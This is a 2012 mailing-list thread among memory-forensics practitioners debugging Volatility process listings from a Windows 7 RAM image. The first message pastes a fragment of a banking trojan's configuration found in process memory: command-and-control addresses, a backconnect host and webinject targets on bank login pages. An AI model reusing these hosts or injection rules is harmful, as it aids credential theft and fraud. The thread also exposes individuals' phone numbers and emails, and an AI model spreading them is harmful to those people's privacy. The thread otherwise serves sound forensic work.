I dumped the System process and ran strings…
<redirects><redirect><pattern>jqueryaddonsv2\.js</pattern><process>http://62.76.180.54/mx5/A/in/cp.php</process></redirect></redirects><bconnect>62.76.180.229:443</bconnect><httpinjects><httpinject><conditions><url type="deny" onpost="1" onget="1">\.(gif|png|jpg|css|swf|js)($|\?)</url><url type="allow" onpost="1" onget="1">/cmserver/welcome/default/verify.cfm</url><url type="allow" onpost="1" onget="1">/pub/html/</url><url type="allow" onpost="1" onget="1">wellsoffice.wellsfargo.com/ceoportal/signon/</url><url type="allow" onpost="1" onget="1">singlepoint.usbank.com/cs70_banking/logon/</url><url type="allow" onpost="1" onget="1">business-eb.ibanking-services.com/K1/</url><url type="allow" onpost="1" onget="1">comerica.com</url>
Ooops! Don’t think that is supposed to be there.
Regards,
Lee Armet | Senior Forensic Investigator | Global Security & Investigations | TD Bank Group
O:416-982-6855 | M:647-242-0002
From: Michael Hale Ligh [mailto:michael.hale@gmail.com]
Sent: Friday, August 17, 2012 10:44 AM
To: Armet, Lee
Cc: phocean; vol-users@volatilityfoundation.org
Subject: Re: [Vol-users] Interesting finding
Thanks and that makes sense. The 2nd System process at the end that George noticed yesterday is found by psscan but not in any other lists, that makes sense also.
MHL
On Fri, Aug 17, 2012 at 10:40 AM, Armet, Lee <Lee.Armet@td.com> wrote:
Yeah, I realize what I had done.
I used mount_ewf.py to mount the memory images to /mnt/ewf
I copied the file from /mnt/ewf to /home/sansforensics/Desktop/VM…/
The file did NOT completely copy over…and was only 1.8gb of the 3.3gb it should have been. My mistake!
My psxview looks great now:
root@SIFT-Workstation:/home/sansforensics/Desktop/VMware-Shared-Drive/myCases/2012-08-0016/mits# vol.py -f mits_ram --profile=Win7SP0x86 psxview
Volatile Systems Volatility Framework 2.2_alpha
Offset(P) Name PID pslist psscan thrdproc pspcdid csrss
---------- -------------------- ------ ------ ------ -------- ------- -----
0xcd1cf030 ccSvcHst.exe 3040 True True True True True
0xcd322340 svchost.exe 724 True True True True True
0xcf35d7a0 ISUSPM.exe 3956 True True True True True
0xcf335708 pdfPro5Hook.ex 3832 True True True True True
0xcd097930 svchost.exe 1764 True True True True True
0xcd439910 csrss.exe 432 True True True True False
0xcd2edb18 dwm.exe 3416 True True True True True
0xcd348318 svchost.exe 804 True True True True True
0xcd181030 Smc.exe 2256 True True True True True
0xcf35b930 BrCcUxSys.exe 1136 True True True True True
0xcd2bf340 explorer.exe 3492 True True True True True
0x05760020 System 4 True True True True False
0xcd2aa030 wininit.exe 504 True True True True True
0xcf360750 SearchIndexer. 2588 True True True True True
0xcd685030 spoolsv.exe 1460 True True True True True
0xcd2dd128 lsass.exe 600 True True True True True
0xcd2d9030 winlogon.exe 592 True True True True True
0xcce07708 BrYNSvc.exe 4080 True True True True True
0xcf31c030 BrStMonW.exe 3936 True True True True True
0xcd695b38 armsvc.exe 1584 True True True True True
0xcda012b0 lsm.exe 632 True True True True True
0xcdc8ebd8 audiodg.exe 3144 True True True True True
0xcdcfb4c0 smss.exe 304 True True True True False
0xcd0535e0 svchost.exe 1492 True True True True True
0xcdb93030 conhost.exe 1324 True True True True True
0xcd3a0030 svchost.exe 996 True True True True True
0xcf300800 jusched.exe 3680 True True True True True
0xcd2d5548 services.exe 568 True True True True True
0xcd6b0ad0 PDFProFiltSrvP 1620 True True True True True
0xcd36b638 BrCtrlCntr.exe 3984 True True True True True
0xcd389958 svchost.exe 940 True True True True True
0xcddc7030 winen.exe 3160 True True True True True
0xcddaad40 sppsvc.exe 3276 True True True True True
0xcf18c998 cmd.exe 3052 True True True True True
0xcdb7d9e0 w3dbsmgr.exe 1656 True True True True True
0xcd1e3b50 taskhost.exe 3308 True True True True True
0xcd7ed830 ccSvcHst.exe 1716 True True True True True
0xcd3e15e8 agent.exe 2584 True True True True True
0xcf3304a0 pptd40nt.exe 3772 True True True True True
0xcd3db030 svchost.exe 1156 True True True True True
0xcf390728 svchost.exe 796 True True True True True
0xcd016930 svchost.exe 1332 True True True True True
0xcd36b030 svchost.exe 888 True True True True True
0xce7ffc28 HP1006MC.EXE 3232 True True True True True
0xcd2aa878 csrss.exe 512 True True True True False
0xcd152d40 wuauclt.exe 2908 True True True True True
0x8824fd79 System 4 False True False False False
Regards,
Lee Armet | Senior Forensic Investigator | Global Security & Investigations | TD Bank Group
O:416-982-6855 | M:647-242-0002
From: Michael Hale Ligh [mailto:michael.hale@gmail.com]
Sent: Friday, August 17, 2012 10:00 AM
To: Armet, Lee
Cc: phocean; vol-users@volatilityfoundation.org
Subject: Re: [Vol-users] Interesting finding
Hi Lee,
Thanks for the follow-up. Two questions:
1) Are you sure the original image is corrupt? You may just need to specify a different dtb or kdbg on command-line. See [ref1] and [ref2]
2) On this new image, I'm assuming the output of psxview looks a lot more reasonable?
Thanks,
MHL
On Fri, Aug 17, 2012 at 9:08 AM, Armet, Lee <Lee.Armet@td.com> wrote:
Here is my pstree:
root@SIFT-Workstation:/mnt/hgfs/myCases/2012-08-0016/mits# vol.py -f mits_ram --profile=Win7SP0x86 pstree
Volatile Systems Volatility Framework 2.2_alpha
Name Pid PPid Thds Hnds Time
-------------------------------------------------- ------ ------ ------ ------ --------------------
0x878aa878:csrss.exe 512 496 11 400 2012-08-14 12:05:08
. 0x87193030:conhost.exe 1324 512 2 54 2012-08-14 17:56:47
0x878d9030:winlogon.exe 592 496 3 122 2012-08-14 12:05:08
0x878aa030:wininit.exe 504 380 3 79 2012-08-14 12:05:08
. 0x878d5548:services.exe 568 504 7 233 2012-08-14 12:05:08
.. 0x879db030:svchost.exe 1156 568 17 361 2012-08-14 12:05:10
.. 0x87a535e0:svchost.exe 1492 568 18 305 2012-08-14 12:05:11
.. 0x85960750:SearchIndexer. 2588 568 14 938 2012-08-14 12:07:17
.. 0x87948318:svchost.exe 804 568 9 296 2012-08-14 12:05:10
.. 0x85990728:svchost.exe 796 568 5 78 2012-08-14 12:07:18
.. 0x87989958:svchost.exe 940 568 24 509 2012-08-14 12:05:10
... 0x878edb18:dwm.exe 3416 940 5 111 2012-08-14 12:07:10
.. 0x8796b030:svchost.exe 888 568 19 504 2012-08-14 12:05:10
... 0x86e8ebd8:audiodg.exe 3144 888 5 129 2012-08-14 17:53:07
.. 0x87a16930:svchost.exe 1332 568 16 524 2012-08-14 12:05:10
.. 0x87485030:spoolsv.exe 1460 568 17 396 2012-08-14 12:05:11
.. 0x86faad40:sppsvc.exe 3276 568 4 166 2012-08-14 17:54:40
.. 0x8717d9e0:w3dbsmgr.exe 1656 568 11 197 2012-08-14 12:05:11
.. 0x875ed830:ccSvcHst.exe 1716 568 62 1441 2012-08-14 12:05:11
... 0x87bcf030:ccSvcHst.exe 3040 1716 19 293 2012-08-14 12:07:09
.. 0x874b0ad0:PDFProFiltSrvP 1620 568 5 60 2012-08-14 12:05:11
.. 0x87495b38:armsvc.exe 1584 568 4 67 2012-08-14 12:05:11
.. 0x87a97930:svchost.exe 1764 568 10 159 2012-08-14 12:05:11
.. 0x87b81030:Smc.exe 2256 568 23 637 2012-08-14 12:05:17
.. 0x879a0030:svchost.exe 996 568 32 1103 2012-08-14 12:05:10
... 0x87b52d40:wuauclt.exe 2908 996 3 91 2012-08-14 12:08:36
.. 0x87be3b50:taskhost.exe 3308 568 8 187 2012-08-14 12:07:10
.. 0x87c07708:BrYNSvc.exe 4080 568 7 128 2012-08-14 12:07:12
.. 0x87922340:svchost.exe 724 568 9 368 2012-08-14 12:05:09
... 0x879e15e8:agent.exe 2584 724 6 259 2012-08-14 12:17:14
... 0x865ffc28:HP1006MC.EXE 3232 724 5 85 2012-08-14 12:07:09
. 0x878dd128:lsass.exe 600 504 7 660 2012-08-14 12:05:08
. 0x870012b0:lsm.exe 632 504 10 140 2012-08-14 12:05:09
0x87639910:csrss.exe 432 380 9 682 2012-08-14 12:05:07
0x878bf340:explorer.exe 3492 3260 24 852 2012-08-14 12:07:10
. 0x85b8c998:cmd.exe 3052 3492 1 20 2012-08-14 17:56:47
.. 0x86fc7030:winen.exe 3160 3052 3 86 2012-08-14 17:57:20
. 0x85935708:pdfPro5Hook.ex 3832 3492 2 55 2012-08-14 12:07:11
. 0x859304a0:pptd40nt.exe 3772 3492 3 72 2012-08-14 12:07:11
. 0x85900800:jusched.exe 3680 3492 1 42 2012-08-14 12:07:11
. 0x8591c030:BrStMonW.exe 3936 3492 5 143 2012-08-14 12:07:12
. 0x8595d7a0:ISUSPM.exe 3956 3492 7 248 2012-08-14 12:07:12
0x8796b638:BrCtrlCntr.exe 3984 3916 2 142 2012-08-14 12:07:12
. 0x8595b930:BrCcUxSys.exe 1136 3984 2 92 2012-08-14 12:07:12
0x85760020:System 4 0 124 599 2012-08-14 12:05:00
. 0x86efb4c0:smss.exe 304 4 2 33 2012-08-14 12:05:00
Regards,
Lee Armet | Senior Forensic Investigator | Global Security & Investigations | TD Bank Group
O:416-982-6855 | M:647-242-0002
From: Michael Hale Ligh [mailto:michael.hale@gmail.com]
Sent: Thursday, August 16, 2012 2:20 PM
To: phocean; Armet, Lee
Cc: vol-users@volatilityfoundation.org
Subject: Re: [Vol-users] Interesting finding
So the weird PID is because the pid column is fixed width for an unsigned short (since the maximum pid is 65535) however the EPROCESS.UniqueProcessId is actually defined as an unsigned int. So what happened is psscan (process pool scanner) picked up a possible structure whose UniqueProcessId value is larger than any valid PID and it gets shortened to "14...5" to fit in the column. I suppose we should fix it so that the whole unsigned int can fit even though those entries are likely to be false positives or a real EPROCESS structure but the pid member has been overritten.
But yes the False in pslist, thrdproc, etc is strange. Does the pslist command work on your image? Also can you paste the full command-line your're using (not just the output)?
Thanks,
MHL
On Thu, Aug 16, 2012 at 1:47 PM, phocean <0x90@phocean.net> wrote:
Personally no, but they will probably more competent people who will answer.
The most surprising is not weird PID but that most processes are hidden from pslist.
Isn't it just a bug or can you tell more about the context ?
--- phocean
Le 16 août 2012 à 17:51, "Armet, Lee" <Lee.Armet@td.com> a écrit :
Anyone ever see this?
0x2253cfb9 14...5 False True False False False
Volatile Systems Volatility Framework 2.2_alpha
Offset(P) Name PID pslist psscan thrdproc pspcdid csrss
---------- -------------------- ------ ------ ------ -------- ------- -----
0x05760020 System 4 True True True True False
0x19863d21 svchost.exe 804 False True False False False
0x18fa330d pdfPro5Hook.ex 3832 False True False False False
0x18a9d585 cmd.exe 3052 False True False False False
0x2eac4d45 svchost.exe 724 False True False False False
0x1d844541 taskhost.exe 3308 False True False False False
0x190203a9 ISUSPM.exe 3956 False True False False False
0x18b2d26a System 4 False True False False False
0x0c1577ed sppsvc.exe 3276 False True False False False
0x190b1335 svchost.exe 796 False True False False False
0x13473a2d wininit.exe 504 False True False False False
0x2253cfb9 14...5 False True False False False
0x22e79729 wuauclt.exe 2908 False True False False False
0x21442a21 ccSvcHst.exe 3040 False True False False False
0x18f75c35 BrStMonW.exe 3936 False True False False False
0x19044359 SearchIndexer. 2588 False True False False False
0x22209305 svchost.exe 1332 False True False False False
0x1900a539 BrCcUxSys.exe 1136 False True False False False
0x227df30d svchost.exe 1764 False True False False False
0x3accbd3d explorer.exe 3492 False True False False False
0x18f980a5 pptd40nt.exe 3772 False True False False False
Regards,
Lee Armet | Senior Forensic Investigator | Global Security & Investigations | TD Bank Group
O:416-982-6855 | M:647-242-0002
NOTICE: Confidential message which may be privileged. Unauthorized use/disclosure prohibited. If received in error, please go to www.td.com/legal for instructions.
AVIS : Message confidentiel dont le contenu peut être privilégié. Utilisation/divulgation interdites sans permission. Si reçu par erreur, prière d'aller auwww.td.com/francais/avis_juridique pour des instructions.
_______________________________________________
Vol-users mailing list
Vol-users@volatilityfoundation.org
http://lists.volatilesystems.com/mailman/listinfo/vol-users
_______________________________________________
Vol-users mailing list
Vol-users@volatilityfoundation.org
http://lists.volatilityfoundation.org/mailman/listinfo/vol-users